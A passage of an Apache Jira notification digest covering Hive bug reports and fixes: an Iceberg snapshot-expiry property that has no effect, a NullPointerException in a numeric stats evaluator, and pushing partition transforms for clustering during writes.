> elapsed time in ms between the second insert and the current time)
>  # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10');
>  # SELECT COUNT(*) FROM default.test5d78b6.snapshots;
> Output: 1. It should be 2 rows. The default of 1 snapshot is retained and 
> all others are expired as usual, so setting the property has no effect.
> Additional Info: the default value for 'history.expire.max-snapshot-age-ms' 
> is 5 days per this link: 
> [https://iceberg.apache.org/docs/1.3.1/configuration/]
> Now, while writing and running the tests, expiring snapshots worked fine 
> within a few seconds of the snapshots being created.
> So I'm assuming that this option doesn't have any effect right now. Having 
> said that, I'm thinking about the implications this will have on end users 
> if we fix it. An end user may not know about this option at all and will 
> have a tough time figuring out why the snapshots are not getting expired. 
> One option could be to set the default to 0 ms.
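> For comparison, a hedged sketch of pinning retention explicitly instead of 
> relying on the age-based default ('history.expire.min-snapshots-to-keep' is 
> the Iceberg property for the minimum retained snapshots; table name as above):
> {code:sql}
> ALTER TABLE test5d78b6 SET 
> TBLPROPERTIES ('history.expire.min-snapshots-to-keep'='2');
> ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10');
> SELECT COUNT(*) FROM default.test5d78b6.snapshots;
> {code}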



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties

2023-11-30 Thread Ayush Saxena (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ayush Saxena updated HIVE-27903:

Summary: Iceberg: Implement Expire Snapshot with default table properties  
(was: TBLPROPERTIES('history.expire.max-snapshot-age-ms') doesn't work)

> Iceberg: Implement Expire Snapshot with default table properties
> 
>
> Key: HIVE-27903
> URL: https://issues.apache.org/jira/browse/HIVE-27903
> Project: Hive
>  Issue Type: Improvement
>  Components: Hive
>Affects Versions: 4.0.0-alpha-2
>Reporter: JK Pasimuthu
>Assignee: Ayush Saxena
>Priority: Major
>  Labels: pull-request-available
>
> [https://github.com/apache/iceberg/issues/9123]
> The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while 
> expiring snapshots.
>  #  
> CREATE TABLE IF NOT EXISTS test5d78b6 (
> id INT, random1 STRING
> )
> PARTITIONED BY (random2 STRING)
> STORED BY ICEBERG
> TBLPROPERTIES (
> 'write.format.default'='orc',
> 'format-version'='2',
> 'write.orc.compression-codec'='none'
> )
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SLEEP for 30 seconds
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 
> 13:23:54.455')) * 1000;
>  # ALTER TABLE test5d78b6 SET 
> tblproperties('history.expire.max-snapshot-age-ms'='54000'); (set to the 
> elapsed time in ms between the second insert and the current time)
>  # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10');
>  # SELECT COUNT(*) FROM default.test5d78b6.snapshots;
> Output: 1. It should be 2 rows. The default of 1 snapshot is retained and 
> all others are expired as usual, so setting the property has no effect.
> Additional Info: the default value for 'history.expire.max-snapshot-age-ms' 
> is 5 days per this link: 
> [https://iceberg.apache.org/docs/1.3.1/configuration/]
> Now, while writing and running the tests, expiring snapshots worked fine 
> within a few seconds of the snapshots being created.
> So I'm assuming that this option doesn't have any effect right now. Having 
> said that, I'm thinking about the implications this will have on end users 
> if we fix it. An end user may not know about this option at all and will 
> have a tough time figuring out why the snapshots are not getting expired. 
> One option could be to set the default to 0 ms.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties

2023-11-30 Thread Ayush Saxena (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791550#comment-17791550
 ] 

Ayush Saxena commented on HIVE-27903:
-

Committed to master.

Thanx [~jkcldr] for the report & [~zhangbutao] for the review!!!

> Iceberg: Implement Expire Snapshot with default table properties
> 
>
> Key: HIVE-27903
> URL: https://issues.apache.org/jira/browse/HIVE-27903
> Project: Hive
>  Issue Type: Improvement
>  Components: Hive
>Affects Versions: 4.0.0-alpha-2
>Reporter: JK Pasimuthu
>Assignee: Ayush Saxena
>Priority: Major
>  Labels: pull-request-available
>
> [https://github.com/apache/iceberg/issues/9123]
> The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while 
> expiring snapshots.
>  #  
> CREATE TABLE IF NOT EXISTS test5d78b6 (
> id INT, random1 STRING
> )
> PARTITIONED BY (random2 STRING)
> STORED BY ICEBERG
> TBLPROPERTIES (
> 'write.format.default'='orc',
> 'format-version'='2',
> 'write.orc.compression-codec'='none'
> )
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SLEEP for 30 seconds
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, 
> uuid(), uuid() FROM test5d78b6
>  # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 
> 13:23:54.455')) * 1000;
>  # ALTER TABLE test5d78b6 SET 
> tblproperties('history.expire.max-snapshot-age-ms'='54000'); (set to the 
> elapsed time in ms between the second insert and the current time)
>  # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10');
>  # SELECT COUNT(*) FROM default.test5d78b6.snapshots;
> Output: 1. It should be 2 rows. The default of 1 snapshot is retained and 
> all others are expired as usual, so setting the property has no effect.
> Additional Info: the default value for 'history.expire.max-snapshot-age-ms' 
> is 5 days per this link: 
> [https://iceberg.apache.org/docs/1.3.1/configuration/]
> Now, while writing and running the tests, expiring snapshots worked fine 
> within a few seconds of the snapshots being created.
> So I'm assuming that this option doesn't have any effect right now. Having 
> said that, I'm thinking about the implications this will have on end users 
> if we fix it. An end user may not know about this option at all and will 
> have a tough time figuring out why the snapshots are not getting expired. 
> One option could be to set the default to 0 ms.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Commented] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE

2023-11-30 Thread liang yu (Jira)


[ 
https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791523#comment-17791523
 ] 

liang yu commented on HIVE-27712:
-

Solution:

Add a check to verify whether the variables _minFieldOI_ and _maxFieldOI_ are 
null; if they are, call _getValueObjectInspector_ with no arguments.
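
A hedged sketch of that guard (field and method names as cited above; the 
actual patch may differ):
{code:java}
// Inside GenericUDAFNumericStatsEvaluator's evaluator setup, per the
// description above (sketch only, not the committed patch):
if (minFieldOI == null || maxFieldOI == null) {
  // Fall back to the no-argument variant instead of dereferencing a null OI.
  minFieldOI = getValueObjectInspector();
  maxFieldOI = getValueObjectInspector();
}
{code}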

> GenericUDAFNumericStatsEvaluator throws NPE
> ---
>
> Key: HIVE-27712
> URL: https://issues.apache.org/jira/browse/HIVE-27712
> Project: Hive
>  Issue Type: Bug
>Reporter: liang yu
>Assignee: liang yu
>Priority: Major
>  Labels: pull-request-available
> Attachments: image-2023-09-19-16-33-49-881.png
>
>
> Using Hadoop 3.3.4 and Hive 3.1.3,
> when I set the config:
> {code:java}
> set hive.groupby.skewindata=true;
> set hive.map.aggr=true; {code}
> and execute a SQL statement with both a group-by and a join, I get the 
> NullPointerException below:
>  
> !image-2023-09-19-16-33-49-881.png!



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE

2023-11-30 Thread ASF GitHub Bot (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

ASF GitHub Bot updated HIVE-27712:
--
Labels: pull-request-available  (was: )

> GenericUDAFNumericStatsEvaluator throws NPE
> ---
>
> Key: HIVE-27712
> URL: https://issues.apache.org/jira/browse/HIVE-27712
> Project: Hive
>  Issue Type: Bug
>Reporter: liang yu
>Assignee: liang yu
>Priority: Major
>  Labels: pull-request-available
> Attachments: image-2023-09-19-16-33-49-881.png
>
>
> Using Hadoop 3.3.4 and Hive 3.1.3,
> when I set the config:
> {code:java}
> set hive.groupby.skewindata=true;
> set hive.map.aggr=true; {code}
> and execute a SQL statement with both a group-by and a join, I get the 
> NullPointerException below:
>  
> !image-2023-09-19-16-33-49-881.png!



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Assigned] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE

2023-11-30 Thread liang yu (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

liang yu reassigned HIVE-27712:
---

Assignee: liang yu

> GenericUDAFNumericStatsEvaluator throws NPE
> ---
>
> Key: HIVE-27712
> URL: https://issues.apache.org/jira/browse/HIVE-27712
> Project: Hive
>  Issue Type: Bug
>Reporter: liang yu
>Assignee: liang yu
>Priority: Major
> Attachments: image-2023-09-19-16-33-49-881.png
>
>
> Using Hadoop 3.3.4 and Hive 3.1.3,
> when I set the config:
> {code:java}
> set hive.groupby.skewindata=true;
> set hive.map.aggr=true; {code}
> and execute a SQL statement with both a group-by and a join, I get the 
> NullPointerException below:
>  
> !image-2023-09-19-16-33-49-881.png!



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27918) Iceberg: Push transforms for clustering during table writes

2023-11-30 Thread ASF GitHub Bot (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

ASF GitHub Bot updated HIVE-27918:
--
Labels: pull-request-available  (was: )

> Iceberg: Push transforms for clustering during table writes
> ---
>
> Key: HIVE-27918
> URL: https://issues.apache.org/jira/browse/HIVE-27918
> Project: Hive
>  Issue Type: Improvement
>Reporter: Sourabh Badhya
>Assignee: Sourabh Badhya
>Priority: Major
>  Labels: pull-request-available
>
> Currently transformed columns (except for the bucket transform) are not 
> pushed / passed as clustering columns. This can lead to incorrect clustering 
> on such columns, which can lead to non-performant writes.
> Hence, push transforms for clustering during table writes.
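> For context, a hedged example of a write that should cluster by the 
> transform rather than the raw column (PARTITIONED BY SPEC is the Hive DDL 
> for Iceberg partition transforms; the table name is hypothetical):
> {code:sql}
> CREATE TABLE events (id int, ts timestamp)
> PARTITIONED BY SPEC (day(ts))
> STORED BY ICEBERG;
> -- Rows written here should be clustered on day(ts), not on raw ts.
> INSERT INTO events VALUES (1, current_timestamp());
> {code}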



--
This message was sent by Atlassian Jira
(v8.20.10#820010)